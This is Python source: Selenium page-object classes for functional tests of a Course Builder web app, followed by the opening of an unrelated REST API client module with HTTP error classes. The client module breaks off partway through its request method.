def find_element_by_css_selector(self, selector, index=None):
if index is None:
return self._tester.driver.find_element_by_css_selector(selector)
else:
return self._tester.driver.find_elements_by_css_selector(
selector)[index]
def find_element_by_id(self, elt_id):
return self._tester.driver.find_element_by_id(elt_id)
def find_element_by_link_text(self, text, index=None):
if index is None:
return self._tester.driver.find_element_by_link_text(text)
else:
return self._tester.driver.find_elements_by_link_text(text)[index]
def find_element_by_name(self, name):
return self._tester.driver.find_element_by_name(name)
def expect_status_message_to_be(self, value):
self.wait().until(
ec.text_to_be_present_in_element(
(by.By.ID, 'gcb-butterbar-message'), value))
def wait_until_status_message_hidden(self):
self.wait().until(
ec.invisibility_of_element_located(
(by.By.ID, 'gcb-butterbar-message')))
return self
class EditorPageObject(PageObject):
"""Page object for pages which wait for the editor to finish loading."""
def __init__(self, tester):
super(EditorPageObject, self).__init__(tester)
def successful_butter_bar(unused_driver):
butter_bar_message = self.find_element_by_id(
'gcb-butterbar-message')
return 'Success' in butter_bar_message.text or (
not butter_bar_message.is_displayed())
self.wait().until(successful_butter_bar)
def set_status(self, status):
select.Select(self.find_element_by_name(
'is_draft')).select_by_visible_text(status)
return self
def click_save(self, link_text='Save', status_message='Saved'):
self.find_element_by_link_text(link_text).click()
self.expect_status_message_to_be(status_message)
return self
def _close_and_return_to(self, continue_page):
self.find_element_by_link_text('Close').click()
return continue_page(self._tester)
class DashboardEditor(EditorPageObject):
"""A base class for the editors accessed from the Dashboard."""
def click_close(self):
return self._close_and_return_to(DashboardPage)
class RootPage(PageObject):
"""Page object to model the interactions with the root page."""
def _add_default_course_if_needed(self, base_url):
"""Setup default read-only course if not yet setup."""
# check default course is deployed
self.get(base_url + '/')
if 'Power Searching with Google' in self._tester.driver.page_source:
return
# deploy it
LoginPage(self._tester).login('test@example.com', admin=True)
self.get(base_url + '/admin?action=settings')
AdminSettingsPage(self._tester).click_override(
'gcb_courses_config'
).set_status('Active').click_save()
self.get(base_url + '/admin?action=courses')
self.find_element_by_link_text('Logout').click()
def load(self, base_url):
self._add_default_course_if_needed(base_url)
self.get(base_url + '/')
return self
def load_welcome_page(self, base_url):
self.click_login(
).login(
'test@example.com', admin=True
)
self.get(base_url + '/admin?action=welcome')
return WelcomePage(self._tester)
def click_login(self):
self.find_element_by_link_text('Login').click()
return LoginPage(self._tester)
def click_dashboard(self):
self.find_element_by_link_text('Dashboard').click()
return DashboardPage(self._tester)
def click_admin(self):
self.find_element_by_link_text('Admin').click()
return AdminPage(self._tester)
def click_announcements(self):
self.find_element_by_link_text('Announcements').click()
return AnnouncementsPage(self._tester)
def click_register(self):
self.find_element_by_link_text('Register').click()
return RegisterPage(self._tester)
class WelcomePage(PageObject):
def click_explore_sample_course(self):
self.find_element_by_id('explore').click()
return DashboardPage(self._tester)
class RegisterPage(PageObject):
"""Page object to model the registration page."""
def enroll(self, name):
enroll = self.find_element_by_name('form01')
enroll.send_keys(name)
enroll.submit()
return self
def verify_enrollment(self):
self._tester.assertTrue(
'Thank you for registering' in self.find_element_by_css_selector(
'.gcb-top-content').text)
return self
def click_course(self):
self.find_element_by_link_text('Course').click()
return RootPage(self._tester)
class AnnouncementsPage(PageObject):
"""Page object to model the announcements page."""
def click_add_new(self):
self.find_element_by_css_selector(
'#gcb-add-announcement > button').click()
return AnnouncementsEditorPage(self._tester)
def verify_announcement(self, title=None, date=None, body=None):
"""Verify that the announcement has the given fields."""
if title:
self._tester.assertEquals(
title, self._tester.driver.find_elements_by_css_selector(
'div.gcb-aside h2')[0].text)
if date:
self._tester.assertEquals(
date, self._tester.driver.find_elements_by_css_selector(
'div.gcb-aside p')[0].text)
if body:
self._tester.assertEquals(
body, self._tester.driver.find_elements_by_css_selector(
'div.gcb-aside p')[1].text)
return self
class AnnouncementsEditorPage(EditorPageObject):
"""Page to model the announcements editor."""
def enter_fields(self, title=None, date=None, body=None):
"""Enter title, date, and body into the announcement form."""
if title:
title_el = self.find_element_by_name('title')
title_el.clear()
title_el.send_keys(title)
if date:
date_el = self.find_element_by_name('date')
date_el.clear()
date_el.send_keys(date)
if body:
body_el = self.find_element_by_name('html')
body_el.clear()
body_el.send_keys(body)
return self
def click_close(self):
return self._close_and_return_to(AnnouncementsPage)
class LoginPage(PageObject):
"""Page object to model the interactions with the login page."""
def login(self, login, admin=False):
email = self.find_element_by_id('email')
email.clear()
email.send_keys(login)
if admin:
self.find_element_by_id('admin').click()
self.find_element_by_id('submit-login').click()
return RootPage(self._tester)
class DashboardPage(PageObject):
"""Page object to model the interactions with the dashboard landing page."""
def load(self, base_url, name):
self.get('/'.join([base_url, name, 'dashboard']))
return self
def verify_read_only_course(self):
self._tester.assertEquals(
'Read-only course.',
self.find_element_by_id('gcb-butterbar-message').text)
return self
def verify_selected_tab(self, tab_text):
tab = self.find_element_by_link_text(tab_text)
self._tester.assertEquals('selected', tab.get_attribute('class'))
def verify_not_publicly_available(self):
self._tester.assertEquals(
'The course is not publicly available.',
self.find_element_by_id('gcb-butterbar-message').text)
return self
def click_import(self):
self.find_element_by_css_selector('#import_course').click()
return Import(self._tester)
def click_add_unit(self):
self.find_element_by_css_selector('#add_unit > button').click()
return AddUnit(self._tester, AddUnit.CREATION_MESSAGE)
def click_edit_unit(self, unit_title):
self.find_element_by_link_text(unit_title).click()
self.find_element_by_link_text('Edit Unit').click()
return AddUnit(self._tester, AddUnit.LOADED_MESSAGE)
def click_add_assessment(self):
self.find_element_by_css_selector('#add_assessment > button').click()
return AddAssessment(self._tester)
def click_add_link(self):
self.find_element_by_css_selector('#add_link > button').click()
return AddLink(self._tester)
def click_add_lesson(self):
self.find_element_by_css_selector('#add_lesson > button').click()
return AddLesson(self._tester)
def click_organize(self):
self.find_element_by_css_selector('#edit_unit_lesson').click()
return Organize(self._tester)
def click_assets(self):
self.find_element_by_link_text('Assets').click()
return AssetsPage(self._tester)
def click_settings(self):
self.find_element_by_link_text('Settings').click()
self.find_element_by_link_text('Homepage').click()
return SettingsPage(self._tester)
def verify_course_outline_contains_unit(self, unit_title):
self.find_element_by_link_text(unit_title)
return self
def click_on_course_outline_components(self, title):
self.find_element_by_link_text(title).click()
return LessonPage(self._tester)
def click_analytics(self, name):
self.find_element_by_link_text('Analytics').click()
self.find_element_by_link_text(name).click()
return AnalyticsPage(self._tester)
def click_course(self):
self.find_element_by_link_text('Course').click()
return RootPage(self._tester)
def click_i18n(self):
self.find_element_by_link_text('I18N').click()
return self
class CourseContentPage(RootPage):
"""Page object for viewing course content."""
def _find_question(self, question_batch_id, question_text):
questions = self._tester.driver.find_elements_by_css_selector(
'[data-question-batch-id="%s"] .qt-mc-question.qt-standalone' %
question_batch_id)
if not questions:
raise AssertionError('No questions in batch "%s" found' %
question_batch_id)
for question in questions:
if (question.find_element_by_css_selector('.qt-question').text ==
question_text):
return question
raise AssertionError('No questions in batch "%s" ' % question_batch_id +
'matched "%s"' % question_text)
def set_answer_for_mc_question(self, question_batch_id,
question_text, answer):
question = self._find_question(question_batch_id, question_text)
choices = question.find_elements_by_css_selector(
'.qt-choices > *')
for choice in choices:
if choice.text == answer:
choice.find_element_by_css_selector(
'input[type="radio"]').click()
return self
raise AssertionError(
'No answer to question "%s" ' % question_text +
'in batch "%s" ' + question_batch_id +
'had an answer matching "%s"' % answer)
def submit_question_batch(self, question_batch_id, button_text):
buttons = self._tester.driver.find_elements_by_css_selector(
'div[data-question-batch-id="%s"] .qt-check-answer-button' %
question_batch_id)
for button in buttons:
if button_text in button.text:
button.click()
if question_batch_id.startswith('L'):
return self
else:
return AssessmentConfirmationPage(self._tester)
raise AssertionError('No button found matching "%s"' % button_text)
class LessonPage(CourseContentPage):
"""Object specific to Lesson behavior."""
def verify_correct_submission(self, question_batch_id, question_text):
question = self._find_question(question_batch_id, question_text)
text = question.find_element_by_css_selector('.qt-feedback').text
if text == 'Yes, the answer is correct.':
return self
raise Exception('Incorrect answer submitted')
def verify_incorrect_submission(self, question_batch_id, question_text):
question = self._find_question(question_batch_id, question_text)
text = question.find_element_by_css_selector('.qt-feedback').text
if text == 'No, the answer is incorrect.':
return self
raise Exception('Correct answer submitted')
def verify_correct_grading(self, question_batch_id):
report = self.find_element_by_css_selector(
'.qt-grade-report[data-question-batch-id="%s"]' % question_batch_id)
if report.text == 'Your score is: 1/1':
return self
raise Exception('Incorrect answer submitted')
def verify_incorrect_grading(self, question_batch_id):
report = self.find_element_by_css_selector(
'.qt-grade-report[data-question-batch-id="%s"]' % question_batch_id)
if report.text == 'Your score is: 0/1':
return self
raise Exception('Correct answer submitted')
def play_video(self, instanceid):
self._tester.driver.execute_script(
'document.getElementById("%s").play();' % instanceid)
time.sleep(1) # Let the video get started before we do anything else.
return self
def pause_video(self, instanceid):
self._tester.driver.execute_script(
'document.getElementById("%s").pause();' % instanceid)
return self
def wait_for_video_state(self, instanceid, attribute, desired_state,
max_patience):
def in_desired_state(driver):
state = driver.execute_script(
'return document.getElementById("%s").%s' % (
instanceid, attribute))
return state == desired_state
self.wait(timeout=max_patience).until(in_desired_state)
return self
class AssessmentConfirmationPage(RootPage):
def verify_correct_submission(self):
completion_p = self.find_element_by_css_selector(
'.gcb-top-content[role="heading"]')
if 'Your score for this assessment is 100%' not in completion_p.text:
raise AssertionError('Success indication not found in "%s"' %
completion_p.text)
return self
def verify_incorrect_submission(self):
completion_p = self.find_element_by_css_selector(
'.gcb-top-content[role="heading"]')
if 'Your score for this assessment is 0%' not in completion_p.text:
raise AssertionError('Failure indication not found in "%s"' %
completion_p.text)
return self
def return_to_unit(self):
self.find_element_by_link_text('Return to Unit').click()
return LessonPage(self._tester)
class SettingsPage(PageObject):
"""Page object for the dashboard's course settings tab."""
def __init__(self, tester):
super(SettingsPage, self).__init__(tester)
def successful_load(unused_driver):
tab = self.find_element_by_link_text('Homepage')
print tab, tab.get_attribute('class'), tab.get_attribute('href')
return 'selected' == tab.get_attribute('class')
self.wait().until(successful_load)
def click_course_options(self):
self.find_element_by_css_selector(
'#edit_course_settings > button').click()
return CourseOptionsEditorPage(self._tester)
class CourseOptionsEditorPage(EditorPageObject):
"""Page object for the dashboard's course ioptions sub tab."""
def click_close(self):
return self._close_and_return_to(SettingsPage)
def click_close_and_confirm(self):
self.find_element_by_link_text('Close').click()
self._tester.driver.switch_to_alert().accept()
time.sleep(0.2)
return SettingsPage(self._tester)
def set_course_name(self, name):
course_title_input = self.find_element_by_name('course:title')
course_title_input.clear()
course_title_input.send_keys(name)
return self
class AssetsPage(PageObject):
"""Page object for the dashboard's assets tab."""
def click_sub_tab(self, text):
self.find_element_by_link_text(text).click()
return self
def click_upload(self):
self.find_element_by_link_text('Upload to assets/img').click()
return AssetsEditorPage(self._tester)
def verify_image_file_by_name(self, name):
self.find_element_by_link_text(name) # throw exception if not found
return self
def verify_no_image_file_by_name(self, name):
self.wait().until(ec.visibility_of_element_located((
by.By.XPATH, '//h3[starts-with(.,\'Images & Documents\')]')))
try:
self.find_element_by_link_text(name) # throw exception if not found
raise AssertionError('Found file %s which should be absent' % name)
except exceptions.NoSuchElementException:
pass
return self
def click_edit_image(self, name):
get_parent_element(
self.find_element_by_link_text(name)
).find_element_by_css_selector('a.icon-edit').click()
return ImageEditorPage(self._tester)
def click_add_short_answer(self):
self.find_element_by_link_text('Add Short Answer').click()
return ShortAnswerEditorPage(self._tester)
def click_add_multiple_choice(self):
self.find_element_by_link_text('Add Multiple Choice').click()
return MultipleChoiceEditorPage(self._tester)
def click_add_question_group(self):
self.find_element_by_link_text('Add Question Group').click()
return QuestionEditorPage(self._tester)
def click_edit_short_answer(self, name):
raise NotImplementedError
def click_edit_mc_question(self):
raise NotImplementedError
def verify_question_exists(self, description):
"""Verifies question description exists on list of question banks."""
tds = self._tester.driver.find_elements_by_css_selector(
'#gcb-main-content tbody td')
for td in tds:
try:
self._tester.assertEquals(description, td.text)
return self
except AssertionError:
continue
raise AssertionError(description + ' not found')
def click_question_preview(self):
self.find_element_by_css_selector(
'#gcb-main-content tbody td .icon-preview').click()
return self
def verify_question_preview(self, question_text):
"""Verifies contents of question preview."""
def load_modal_iframe(driver):
try:
driver.switch_to_frame(
driver.find_element_by_css_selector('#modal-window iframe'))
except exceptions.NoSuchFrameException:
return False
else:
return True
self.wait().until(load_modal_iframe)
question = self._tester.driver.find_element_by_css_selector(
'.qt-question')
self._tester.assertEquals(question_text, question.text)
self._tester.driver.switch_to_default_content()
self._tester.driver.find_element_by_css_selector(
'#modal-window .close-button').click()
return self
def click_add_label(self):
self.find_element_by_link_text('Add Label').click()
return LabelEditorPage(self._tester)
def verify_label_present(self, title):
self.find_element_by_id('label_' + title) # Exception if not found.
return self
def verify_label_not_present(self, title):
try:
self.find_element_by_id('label_' + title) # Exception if not found.
raise AssertionError('Unexpectedly found label %s' % title)
except exceptions.NoSuchElementException:
pass
return self
def click_edit_label(self, title):
self.find_element_by_id('label_' + title).click()
return LabelEditorPage(self._tester)
def click_outline(self):
self.find_element_by_link_text('Outline').click()
return DashboardPage(self._tester)
class AssetsEditorPage(DashboardEditor):
"""Page object for upload image page."""
def select_file(self, path):
self.find_element_by_name('file').send_keys(path)
return self
def click_upload_and_expect_saved(self):
self.find_element_by_link_text('Upload').click()
self.expect_status_message_to_be('Saved.')
# Page automatically redirects after successful save.
self.wait().until(ec.title_contains('Assets'))
return AssetsPage(self._tester)
class QuestionEditorPage(EditorPageObject):
"""Abstract superclass for page objects for add/edit questions pages."""
def set_question(self, question):
question_el = self.find_element_by_name('question')
question_el.clear()
question_el.send_keys(question)
return self
def set_description(self, description):
question_el = self.find_element_by_name('description')
question_el.clear()
question_el.send_keys(description)
return self
def click_close(self):
return self._close_and_return_to(AssetsPage)
class MultipleChoiceEditorPage(QuestionEditorPage):
"""Page object for editing multiple choice questions."""
def click_add_a_choice(self):
self.find_element_by_link_text('Add a choice').click()
return self
def set_answer(self, n, answer):
answer_el = self.find_element_by_id('gcbRteField-' + str(2 * n + 1))
answer_el.clear()
answer_el.send_keys(answer)
return self
def click_allow_only_one_selection(self):
raise NotImplementedError
def click_allow_multiple_selections(self):
raise NotImplementedError
class ShortAnswerEditorPage(QuestionEditorPage):
"""Page object for editing short answer questions."""
def click_add_an_answer(self):
self.find_element_by_link_text('Add an answer').click()
return self
def set_score(self, n, score):
score_el = self.find_element_by_name('graders[%d]score' % n)
score_el.clear()
score_el.send_key(score)
def set_response(self, n, response):
response_el = self.find_element_by_name('graders[%d]response' % n)
response_el.clear()
response_el.send_key(response)
def click_delete_this_answer(self, n):
raise NotImplementedError
class LabelEditorPage(EditorPageObject):
def set_title(self, text):
title_el = self.find_element_by_name('title')
title_el.clear()
title_el.send_keys(text)
return self
def verify_title(self, text):
title_el = self.find_element_by_name('title')
self._tester.assertEqual(text, title_el.get_attribute('value'))
return self
def set_description(self, description):
description_el = self.find_element_by_name('description')
description_el.clear()
description_el.send_keys(description)
return self
def verify_description(self, description):
description_el = self.find_element_by_name('description')
self._tester.assertEqual(description,
description_el.get_attribute('value'))
return self
def set_type(self, type_num):
type_el = self.find_element_by_id('_inputex_radioId%d' % type_num)
type_el.click()
return self
def verify_type(self, type_num):
type_el = self.find_element_by_id('_inputex_radioId%d' % type_num)
self._tester.assertEqual('true', type_el.get_attribute('checked'))
return self
def click_delete(self):
self.find_element_by_link_text('Delete').click()
return self
def confirm_delete(self):
self._tester.driver.switch_to_alert().accept()
return AssetsPage(self._tester)
def click_close(self):
return self._close_and_return_to(AssetsPage)
class ImageEditorPage(EditorPageObject):
"""Page object for the dashboard's view/delete image page."""
def click_delete(self):
self.find_element_by_link_text('Delete').click()
return self
def confirm_delete(self):
self._tester.driver.switch_to_alert().accept()
return AssetsPage(self._tester)
class Import(DashboardEditor):
"""Page object to model the dashboard's unit/lesson organizer."""
pass
class AddLink(DashboardEditor):
"""Page object to model the dashboard's link editor."""
def __init__(self, tester):
super(AddLink, self).__init__(tester)
self.expect_status_message_to_be(
'New link has been created and saved.')
class CourseContentElement(DashboardEditor):
RTE_EDITOR_FORMAT = 'gcbRteField-%d_editor'
RTE_TEXTAREA_ID = 'gcbRteField-0'
def set_title(self, title):
title_el = self.find_element_by_name('title')
title_el.clear()
title_el.send_keys(title)
return self
def click_rich_text(self, index=0):
self.wait_until_status_message_hidden()
el = self.find_element_by_css_selector('div.rte-control', index)
self._tester.assertEqual('Rich Text', el.text)
el.click()
self.wait().until(ec.element_to_be_clickable(
(by.By.ID, CourseContentElement.RTE_EDITOR_FORMAT % index)))
return self
def click_plain_text(self, index=None):
el = self.find_element_by_css_selector('div.rte-control', index)
self._tester.assertEqual('<HTML>', el.text)
el.click()
return self
def click_rte_add_custom_tag(self, index=0):
self.find_element_by_link_text(
'Insert Google Course Builder component', index).click()
return self
def select_rte_custom_tag_type(self, option_text):
"""Select the given option from the custom content type selector."""
self._ensure_rte_iframe_ready_and_switch_to_it()
select_tag = self.find_element_by_name('tag')
for option in select_tag.find_elements_by_tag_name('option'):
if option.text == option_text:
option.click()
break
else:
self._tester.fail('No option "%s" found' % option_text)
self.wait().until(ec.element_to_be_clickable(
(by.By.PARTIAL_LINK_TEXT, 'Close')))
self._tester.driver.switch_to_default_content()
return self
def _ensure_rte_iframe_ready_and_switch_to_it(self):
self.wait().until(
ec.frame_to_be_available_and_switch_to_it('modal-editor-iframe'))
# Ensure inputEx has initialized too
self.wait().until(
ec.element_to_be_clickable(
(by.By.PARTIAL_LINK_TEXT, 'Close')))
def set_rte_lightbox_field(self, field_css_selector, value):
self._ensure_rte_iframe_ready_and_switch_to_it()
field = self.find_element_by_css_selector(field_css_selector)
field.clear()
field.send_keys(value)
self._tester.driver.switch_to_default_content()
return self
def click_rte_save(self):
self._ensure_rte_iframe_ready_and_switch_to_it()
self.find_element_by_link_text('Save').click()
self._tester.driver.switch_to_default_content()
return self
def send_rte_text(self, text):
# Work around Selenium bug: If focus is in another window
# and in a text area, send_keys won't work. Steal focus
# immediately before sending keys.
# https://code.google.com/p/selenium/issues/detail?id=2977
self._tester.driver.execute_script('window.focus();')
textarea = self.find_element_by_id('gcbRteField-0_editor')
textarea.click()
textarea.send_keys(keys.Keys.HOME)
textarea.send_keys(text)
return self
def doubleclick_rte_element(self, elt_css_selector, index=0):
self._tester.driver.switch_to_frame(
CourseContentElement.RTE_EDITOR_FORMAT % index)
target = self.find_element_by_css_selector(elt_css_selector)
action_chains.ActionChains(
self._tester.driver).double_click(target).perform()
self._tester.driver.switch_to_default_content()
return self
def ensure_rte_lightbox_field_has_value(self, field_css_selector, value):
self._ensure_rte_iframe_ready_and_switch_to_it()
self._tester.assertEqual(
value,
self.find_element_by_css_selector(
field_css_selector).get_attribute('value'))
self._tester.driver.switch_to_default_content()
return self
def _get_rte_contents(self):
return self.find_element_by_id(
CourseContentElement.RTE_TEXTAREA_ID).get_attribute('value')
def _get_instanceid_list(self):
"""Returns a list of the instanceid attrs in the lesson body."""
html = self._get_rte_contents()
html_list = html.split(' instanceid="')
instanceid_list = []
for item in html_list[1:]:
closing_quote_ind = item.find('"')
instanceid_list.append(item[:closing_quote_ind])
return instanceid_list
def ensure_instanceid_count_equals(self, value):
self._tester.assertEqual(value, len(self._get_instanceid_list()))
return self
def take_snapshot_of_instanceid_list(self, list_to_fill=None):
self.instanceid_list_snapshot = self._get_instanceid_list()
if list_to_fill is not None:
list_to_fill.extend(self.instanceid_list_snapshot)
return self
def ensure_instanceid_list_matches_last_snapshot(self):
self._tester.assertEqual(
self.instanceid_list_snapshot, self._get_instanceid_list())
return self
def _codemirror_is_ready_builder(self, nth_instance):
def codemirror_is_ready(unused_driver):
return self._tester.driver.execute_script(
"return $('.CodeMirror')[%s]"
".CodeMirror.gcbCodeMirrorMonitor.cmReady;" % nth_instance)
return codemirror_is_ready
def setvalue_codemirror(self, nth_instance, code_body):
self.wait().until(self._codemirror_is_ready_builder(nth_instance))
self._tester.driver.execute_script(
"$('.CodeMirror')[%s].CodeMirror.setValue('%s');" % (
nth_instance, code_body))
return self
def assert_equal_codemirror(self, nth_instance, expected_code_body):
self.wait().until(self._codemirror_is_ready_builder(nth_instance))
actual_code_body = self._tester.driver.execute_script(
"return $('.CodeMirror')[%s].CodeMirror.getValue();" % nth_instance)
self._tester.assertEqual(expected_code_body, actual_code_body)
return self
class AddUnit(CourseContentElement):
"""Page object to model the dashboard's add unit editor."""
CREATION_MESSAGE = 'New unit has been created and saved.'
LOADED_MESSAGE = 'Success.'
INDEX_UNIT_HEADER = 0
INDEX_UNIT_FOOTER = 1
def __init__(self, tester, expected_message):
super(AddUnit, self).__init__(tester)
self.expect_status_message_to_be(expected_message)
def set_pre_assessment(self, assessment_name):
select.Select(self.find_element_by_name(
'pre_assessment')).select_by_visible_text(assessment_name)
return self
def set_post_assessment(self, assessment_name):
select.Select(self.find_element_by_name(
'post_assessment')).select_by_visible_text(assessment_name)
return self
def set_contents_on_one_page(self, setting):
print
labels = self._tester.driver.find_elements_by_tag_name('label')
one_page_label = None
for label in labels:
if label.text == 'Show Contents on One Page':
one_page_label = label
break
label_div = one_page_label.find_element_by_xpath('..')
checkbox_div = label_div.find_element_by_xpath('..')
checkbox = checkbox_div.find_element_by_css_selector(
'input[type="checkbox"]')
if checkbox.is_selected() != setting:
checkbox.click()
return self
class AddAssessment(CourseContentElement):
"""Page object to model the dashboard's assessment editor."""
INDEX_CONTENT = 0
INDEX_REVIEWER_FEEDBACK = 1
def __init__(self, tester):
super(AddAssessment, self).__init__(tester)
self.expect_status_message_to_be(
'New assessment has been created and saved.')
class AddLesson(CourseContentElement):
"""Page object to model the dashboard's lesson editor."""
def __init__(self, tester):
super(AddLesson, self).__init__(tester)
self.instanceid_list_snapshot = []
self.expect_status_message_to_be(
'New lesson has been created and saved.')
def ensure_lesson_body_textarea_matches_regex(self, regex):
rte_contents = self._get_rte_contents()
self._tester.assertRegexpMatches(rte_contents, regex)
return self
def set_questions_are_scored(self):
select.Select(self.find_element_by_name(
'scored')).select_by_visible_text('Questions are scored')
return self
def set_questions_give_feedback(self):
select.Select(self.find_element_by_name(
'scored')).select_by_visible_text('Questions only give feedback')
return self
class Organize(DashboardEditor):
"""Page object to model the dashboard's unit/lesson organizer."""
pass
class AdminPage(PageObject):
"""Page object to model the interactions with the admimn landing page."""
def click_add_course(self):
self.find_element_by_id('add_course').click()
return AddCourseEditorPage(self._tester)
def click_settings(self):
self.find_element_by_link_text('Settings').click()
return AdminSettingsPage(self._tester)
class AdminSettingsPage(PageObject):
"""Page object for the admin settings."""
def click_override_admin_user_emails(self):
self._tester.driver.find_elements_by_css_selector(
'button.gcb-button')[0].click()
return ConfigPropertyOverridePage(self._tester)
def click_override(self, setting_name):
self.find_element_by_id(setting_name).click()
return ConfigPropertyOverridePage(self._tester)
def verify_admin_user_emails_contains(self, email):
self._tester.assertTrue(
email in self._tester.driver.find_elements_by_css_selector(
'table.gcb-config tr')[1].find_elements_by_css_selector(
'td')[1].text)
class ConfigPropertyOverridePage(EditorPageObject):
"""Page object for the admin property override editor."""
def clear_value(self):
element = self.find_element_by_name('value')
element.clear()
return self
def set_value(self, value):
element = self.find_element_by_name('value')
if type(value) is bool:
current_value = element.get_attribute('value').lower()
if str(value).lower() != current_value:
checkbox = get_parent_element(
element).find_element_by_css_selector('[type="checkbox"]')
checkbox.send_keys(' ') # Toggle, iff necessary.
else:
element.send_keys(value)
return self
def click_close(self):
return self._close_and_return_to(AdminSettingsPage)
class AddCourseEditorPage(EditorPageObject):
"""Page object for the dashboards' add course page."""
def set_fields(self, name=None, title=None, email=None):
"""Populate the fields in the add course page."""
name_el = self.find_element_by_name('name')
title_el = self.find_element_by_name('title')
email_el = self.find_element_by_name('admin_email')
name_el.clear()
title_el.clear()
email_el.clear()
if name:
name_el.send_keys(name)
if title:
title_el.send_keys(title)
if email:
email_el.send_keys(email)
return self
def click_close(self):
return self._close_and_return_to(AdminPage)
class AnalyticsPage(PageObject):
"""Page object for analytics sub-tab."""
def wait_until_logs_not_empty(self, data_source):
def data_source_logs_not_empty(unused_driver):
return self.get_data_source_logs(data_source)
self.wait().until(data_source_logs_not_empty)
return self
def get_data_page_number(self, data_source):
# When there is a chart on the page, the chart-drawing animation
# takes ~1 sec to complete, which blocks the JS to unpack and paint
# the data page numbers.
max_wait = time.time() + 10
text = self.find_element_by_id('model_visualizations_dump').text
while not text and time.time() < max_wait:
time.sleep(0.1)
text = self.find_element_by_id('model_visualizations_dump').text
numbers = {}
for line in text.split('\n'):
name, value = line.split('=')
numbers[name] = int(value)
return numbers[data_source]
def get_displayed_page_number(self, data_source):
return self.find_element_by_id('gcb_rest_source_page_number_' +
data_source).text
def get_data_source_logs(self, data_source):
return self.find_element_by_id(
'gcb_log_rest_source_' + data_source).text
def get_page_level_logs(self):
return self.find_element_by_id('gcb_rest_source_errors').text
def click(self, data_source, button):
name = 'gcb_rest_source_page_request_' + button + '_' + data_source
self.find_element_by_id(name).click()
def buttons_present(self, data_source):
try:
self.find_element_by_id('gcb_rest_source_request_zero_' +
data_source)
return True
except exceptions.NoSuchElementException:
return False
def set_chunk_size(self, data_source, chunk_size):
field = self.find_element_by_id(
'gcb_rest_source_chunk_size_' + data_source)
field.clear()
field.send_keys(str(chunk_size))
def answers_pie_chart_present(self):
div = self.find_element_by_id('answers_pie_chart')
svgs = div.find_elements_by_tag_name('svg')
# pylint: disable-msg=g-explicit-length-test
return len(svgs) > 0
class AppengineAdminPage(PageObject):
def __init__(self, tester, base_url, course_name):
super(AppengineAdminPage, self).__init__(tester)
self._base_url = base_url
self._course_name = course_name
def get_datastore(self, entity_kind):
self.get(
self._base_url + '/datastore' +
'?namespace=ns_%s' % self._course_name +
'&kind=%s' % entity_kind)
return DatastorePage(self._tester)
class DatastorePage(PageObject):
def get_items(self):
data_table = self._tester.driver.find_element_by_css_selector(
'table.ae-table')
title_elements = data_table.find_elements_by_css_selector(
'table.ae-table th')
for index, element in enumerate(title_elements):
if element.text.strip() == 'Key':
key_index = index
rows = data_table.find_elements_by_css_selector('tr')
data_urls = []
for row in rows:
cells = row.find_elements_by_css_selector('td')
if len(cells) > key_index:
url = cells[key_index].find_elements_by_tag_name(
'a')[0].get_attribute('href')
data_urls.append(url)
data = []
for data_url in data_urls:
self.get(data_url)
rows = self._tester.driver.find_elements_by_css_selector(
'div.ae-settings-block')
item = {}
data.append(item)
for row in rows:
labels = row.find_elements_by_tag_name('label')
if labels:
name = re.sub(r'\(.*\)', '', labels[0].text).strip()
value_blocks = row.find_elements_by_tag_name('div')
if value_blocks:
inputs = value_blocks[0].find_elements_by_tag_name(
'input')
if inputs:
value = inputs[0].get_attribute('value').strip()
else:
value = value_blocks[0].text.strip()
item[name] = value
self._tester.driver.back()
return data
|
|
import json
import urlparse
from requests.auth import HTTPBasicAuth
import requests
def show_me_the_logs():
"""Turns on debug-level logging in requests
This helps to find out wtf is going wrong.
"""
import httplib
httplib.HTTPConnection.debuglevel = 1
import logging
# you need to initialize logging, otherwise you will not see
# anything from requests
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
class RestAPIException(Exception):
def __init__(self, *args, **kwargs):
self.__dict__.update(kwargs)
super(RestAPIException, self).__init__(*args)
class Http4xxException(RestAPIException):
"""Exception for 4xx errors.
These usually mean you did something wrong.
:property response: The full requests `Response` object.
Example::
from steve.restapi import Http4xxException
try:
# do something here
except Http4xxException as exc:
# oh noes! i did something wrogn!
# This tells you the actual HTTP status code
print exc.response.status_code
# This tells you the content of the response---sometimes
# the server will tell you an error message and it's
# probably in here.
print exc.response.content
"""
pass
class Http5xxException(RestAPIException):
"""Exception for 5xx errors.
These usually mean the server did something wrong. Let me know.
:property response: The full requests `Response` object.
Example::
from steve.restapi import Http5xxException
try:
# do something here
except Http5xxException as exc:
# oh noes! i hit dumb willkg code and server is br0ken!
# This tells you the actual HTTP status code
print exc.response.status_code
# This tells you the content of the response---sometimes
# the server will tell you an error message and it's
# probably in here.
print exc.response.content
"""
pass
def urljoin(base, *args):
"""Add bits to the url path."""
parts = list(urlparse.urlsplit(base))
path = [p for p in parts[2].split('/') if p]
path.extend(args)
parts[2] = '/'.join(path)
return urlparse.urlunsplit(parts)
def get_content(resp):
"""Returns the JSON content from a response.
.. Note::
Mostly this just deals with the fact that requests changed
`.json` from a property to a method. Once that settles out and
we can use requests >= 1.0, then we can ditch this.
"""
try:
# requests changed from a .json property to a .json method,
# so, deal with both here.
if callable(resp.json):
return resp.json()
else:
return resp.json
except Exception as exc:
# TODO: Fix this. The requests docs say that .json throws an
# exception but doesn't specify which one. Need to toss some
# bad "json" at it and see what it does so we can make this
# except suck less.
print 'Error: get_content threw {0}'.format(exc)
return resp.text
class Resource(object):
"""Convenience wrapper for requests.request.
HTTP methods return requests Response objects or throw
exceptions in cases where things are weird.
"""
def __init__(self, **kwargs):
self._kwargs = kwargs
url = kwargs['url']
id_ = kwargs.get('id')
if id_:
url = urljoin(url, str(id_))
self._kwargs['url'] = url
self.session = requests.session()
def __call__(self, id_):
kwargs = dict(self._kwargs)
kwargs['id'] = id_
return Resource(**kwargs)
def _get_auth_header(self, auth_token):
if auth_token is not None:
return {
'Authorization': 'Basic {0}'.format(auth_token)
}
return {}
def _request(self, method, data=None, params=None, headers=None,
url=None, auth=None):
if not url:
url = self._kwargs['url']
default_headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
if headers:
default_headers.update(headers)
args = {
'data': data,
'params': params,
'headers': default_headers,
}
if auth:
args['auth'] = auth
resp = self.session.request(method, url, **args)
if 400 <= resp.status_code <= 499:
print resp.headers
print resp.content
raise Http4xxException(
'HTTP {0}: {1} {2}'.format(resp.status_code, method, url),
response=resp)
elif 500 <= resp.status_code <= 599:
